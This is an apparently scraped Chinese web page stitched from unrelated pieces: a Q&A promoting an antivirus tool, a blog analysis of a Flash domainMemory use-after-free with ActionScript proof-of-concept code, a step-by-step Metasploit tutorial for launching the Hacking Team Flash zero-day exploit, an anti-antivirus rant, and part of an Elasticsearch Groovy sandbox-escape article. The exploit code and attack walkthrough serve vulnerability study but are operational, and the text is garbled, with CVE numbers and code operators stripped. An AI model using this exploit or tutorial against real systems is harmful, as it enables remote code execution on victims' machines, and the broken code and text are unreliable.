CVE-cve 2015 1538-2661 怎样解决

cve- 漏洞怎么修复_百度知道
cve- 漏洞怎么修复
提问者采纳
楼主你好可以腾讯电脑管家修复当发现微软或者第三方软件的高危漏洞时,腾讯电脑管家会第一时间回应保障用户机器安全,当有官方补丁时会立即发布。但当微软或者第三方暂时没提供补丁时,腾讯电脑管家会发挥强大的技术能力为用户提供自制补丁保障安全。请及时修复管家提示的高危漏洞确保您电脑的安全
来自团队:
其他类似问题
为您推荐:
cve的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁Anslysis Of CVE-
时间: 21:14:39
&&&& 阅读:424
&&&& 评论:
&&&& 收藏:0
标签:&&&&&&&&&&&&&&&&&&&&&&&&&&&最近Flash 0day各种爆,抽空分析了一个手头已经有的CVE-样本,作为flash分析的一个学习笔记,毕竟这是个flash的UAF漏洞,以前在IE里面分析比较多,在flash上却没怎么遇到过此类漏洞,因此有必要学习下在flash没有符号的情况下UAF怎么分析。样本来源于/analysis/YTgzNDAyZTg0MDI3NDZhMThmZTE4N2YxZTVkMjBhMTc/1.反混淆反混淆方法具体可以查看前面的文章/Lamboy/p/4278066.html
这里直接略过。2.POC参考趋势科技的分析报告,构造的poc代码如下:
import flash.display.MovieClip;
import flash.utils.ByteA
import flash.utils.E
import flash.system.ApplicationD
import flash.utils.*;
import flash.display.*;
import avm2.intrinsics.memory.*;
public final class poc extends MovieClip
public static function ByteArrayWriter(param1:ByteArray, param2:int) : void
param1.position = 0;
var c:uint = 0;
while(c & param1.length / 4)
param1.writeInt(param2);
param1.position = 0;
public function poc()
var test_b:ByteArray=new ByteArray();
test_b.endian = Endian.LITTLE_ENDIAN;
test_b.position=0;
var a:uint = 0;
var b:uint=0xfeedface;
while(true)
if(a &= 8192/4)
test_b.writeUnsignedInt(b + a);
var c:uint=512;
test_b.position=c;
while(c&test_b.length)
test_b.writeByte(c);
//modify compressed ByteArray
ApplicationDomain.currentDomain.domainMemory = test_b;
//set domainMemory
var x:uint=0x;
var y:uint=0xaabbccdd;
test_b.uncompress();
catch(error:Error)
trace("exception");
var test_c:Vector.&uint&=new Vector.&uint&(0x7f8);
for(var i:uint=0;i&0x7f8;i+=1)
test_c[i]=i;
x=x+li32(0);//read vector length
si32(0x7fffffff,0x0);//modify vector length
x=test_c[0x];
在AIR SDK下编译通过。
3.漏洞成因
根据趋势科技的Blog描述,这是一个DomainMemory产生的UAF,主要在DomainMemory指向的ByteArray在进行Compress和Uncompress时,对内存的处理错误导致。首先创建了一个名为test_b,大小为0&2000的ByteArray,然后初始化ByteArray的内容如下:
紧接着将ByteArray进行压缩,压缩时会创建新的Buffer来保存压缩后的数据:之后代码会修改ByteArray位于0&200之后的数据:将ByteArray设置为DomainMemory,设置完成后在DomainMemory中保存该ByteArray的buffer:
其中0xaab8000为DomainMemory指向的Buffer,之后紧跟着DomainMemory的大小。此时一切都没有问题,但是接下来的代码会将该ByteArray进行解压缩,你是否还记得我们前面对ByteArray的0&200之后的数据进行了修改?这样在用同样的算法解压缩时就会出现问题,导致解压缩失败,而avm在解压缩时通过一个叫做Grower的类来处理解压缩,该类会动态分配解压缩的Buffer大小,这样在解压缩时先分配足够的空间并解压数据,发现解压失败则释放分配的ByteArray,不过由于这个数组比较特殊,因为他是个DomainMemory类型,这样在解压缩时先将分配的buffer更新到DomainMemory结构中,但是由于解压失败,这块buffer最终被释放了,但是DomainMemory中仍然保留了这块buffer的指针,因此在try catch捕获到解压的异常后会继续执行,但DomainMemory却指向一个被Free掉的内存:
此时的DomainMemory中指向的Buffer已经是一片释放的内容了。
接下来通过Vector来分配这块内存并填充数据:
上图可以看到,DomainMemory的buffer指向了一个Vector结构,这样就可以通过DomainMemory的专属指令来读取和修改vector大小了:
修改后的Vector:
这样就可以对内存进行全局的读写了。
4.补丁对比
Adobe在flash版本为16.0.0.296中修复了此漏洞,修复后对ByteArray进行unmpress失败后,并没有将新的Buffer更新到DomainMemory的Buffer中:
/trendlabs-security-intelligence/analyzing-cve--flash-zero-day-vulnerability/
&标签:&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&& &&&&&&
&& &&&&&&&&&&
版权所有 鲁ICP备号-4
打开技术之扣,分享程序人生!Metasploit CVE- Flash漏洞利用教程
前段时间,Hacking Team军火库泄露闹得沸沸扬扬各大安全公司也争先恐后地发布了各种的攻击代码分析,但是小编作为一只WEB狗,根本看不懂二进制。有了漏洞分析文章、了解了漏洞细节,但就是告诉WEB狗狗们如何利用
在这篇文章中,我们将在Metasploit中利用CVE-(Adobe Flash opaqueBackground Use After Free)Flash 0day 漏洞模块,这一漏洞出现在下载恶意Flash文件时候。最新版本的Adobe Flash播放器(/bid/75712)爆出的漏洞出自ActionScript的三个字节数组(ByteArray,),opaqueBackground和BitmapData class。攻击者利用这些漏洞可以在受害者设备上远程执行任意代码。
CVE-是Hacking Team泄露的军火库中有关Adobe Flash播放器(18.0.0.203)的第三枚0day,影响Windows、MacOSX和Linux平台上的IE、Chrome浏览器等主流浏览器。国外发布这篇漏洞利用教程的时候,Adobe已经发布了安全更新。本教程仅供参考。
一.准备工作
首先下载利用代码,并且对利用代码进行重命名为:Adobe_Flash_HackingTeam_exploit.rb
接着在这里下载Payload,把msf.swf移动到:/usr/share/metasploit-framework/data/exploits/CVE-/msf.swf复制exploit到Metasploit 利用模块的文件夹:
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/
(因为在/usr/share/metasploit-framework/modules/exploits/windows/中没有flash这一文件夹,操作之前需要先新建flash文件夹 )
用下面的命令来检查文件是否已经复制到目标文件夹:
ls /usr/share/metasploit-framework/modules/exploits/windows/flash/
二.开始开启一个新的终端并启动Metasploit:
service postgresql start
service metasploit start
msfconsole
现在我们启动了Metasploit并且加载了刚刚新加入的exploit,可以使用命令搜索到它:
search hackingteam
使用新添加的Exploit执行以下命令:
use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit
接着执行下面的命令检查cve-模块需要使用到的选项:
show options
保持默认选项,执行&run&或者&exploit&命令来启动这个exp
开启一台运行Windows 8.1的虚拟机,使用存在漏洞的浏览器(火狐)并且安装版本为18.0.0.203的Flash播放器, 打开刚刚的链接。
预防工作:
及时更新Flash播放器;
及时更新系统漏洞补丁,保持系统更新;
安装杀毒软件和防火墙;
及时更新浏览器,使用最新版本;
不安装不需要的插件;
五.题外话安全来自预防,寄希望于事后杀毒于事无补!
免疫=上环结扎
克隆恢复=无痛人流
重装系统=投胎转世
现在的杀毒软件,干的基本上都是打胎的勾当,把病毒放进来(或部分放进来)再杀,从而欺骗普通用户,让用户觉得:这个杀毒软件有用,给我杀掉那么多病毒!我不想与杀毒软件的&专家&们争论所谓的技术问题,只想问大家一句:你购买的杀毒产品给你解决病毒问题了么?!
杀毒产品用户与厂商是一个合同关系,如果厂商不能有效给用户提供安全,老是经常让病毒侵入,反毒技术落后,升级响应不及时,厂商的这种违约行为又给了用户什么补偿?用户负责给厂商付钱,厂商给用户负了什么责?他们的责任尽到位了吗?!如果反病毒引擎过关的话,为什么仍然要依赖所谓的&专杀&?典型病毒需要借助免费的&专杀&处理,那么付费用户与未付费用户又有什么差别?!我们鄙视的是现在的杀毒产品,而不是否定杀毒技术本身,这是个逻辑问题而不是技术问题,不要拿个例说事。以防为主的防毒技术是日后反病毒技术的必然归宿。但微点为什么受到打压?广大用户为什么仍然在&享受&众多杀软厂商的愚民宣传?
请牢记:杀毒软件永远只代表软件厂商的利益!
动自己的手,让别人花时间杀毒去吧!
打你的的补丁,让别人花钱买杀软去吧!
免你的疫,让别人杀毒去吧!
避你的孕,让别人打胎去吧!
完善我们的工具箱,让别人束手无策去吧!
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】ElasticSearch 远程代码执行漏洞分析(CVE-)&高级利用方法
0x00 漏洞概述
要结合上一篇文章《ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-)》一起来看,我第一次知道CVE-这个漏洞是在2月13日(春节放假前一天),但是当时想着过年,而且觉得应该是Groovy自身的问题,就也没太在意。知道前两天兰少(lupin)问我有没有看这个漏洞,说他找到了绕过了沙盒的方法,才跑去看。
我跟lupin玩这个洞的思路不太一样,而且漏洞原理在他的文章里已经说的很清楚了,我这篇文章主要侧重这个漏洞利用的各种玩法。
0x01 漏洞原理
漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy对自己的描述:
没错!Groovy是一款开发语言,这意味着我们完全可以在不使用Java的前提下实现代码执行。如果仅仅是沙盒的问题,那么修补黑白名单到攻击者没办法绕过沙盒使用Java反射就好了,但是一种语言要怎么靠黑白名单来限制它的绝大部分功能?所以没有把Groovy当做一种编程语言是这问题的真正原因。
[1]&&&&&&&&&&&&
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】

我要回帖

更多关于 cve 2015 3636 的文章

 

随机推荐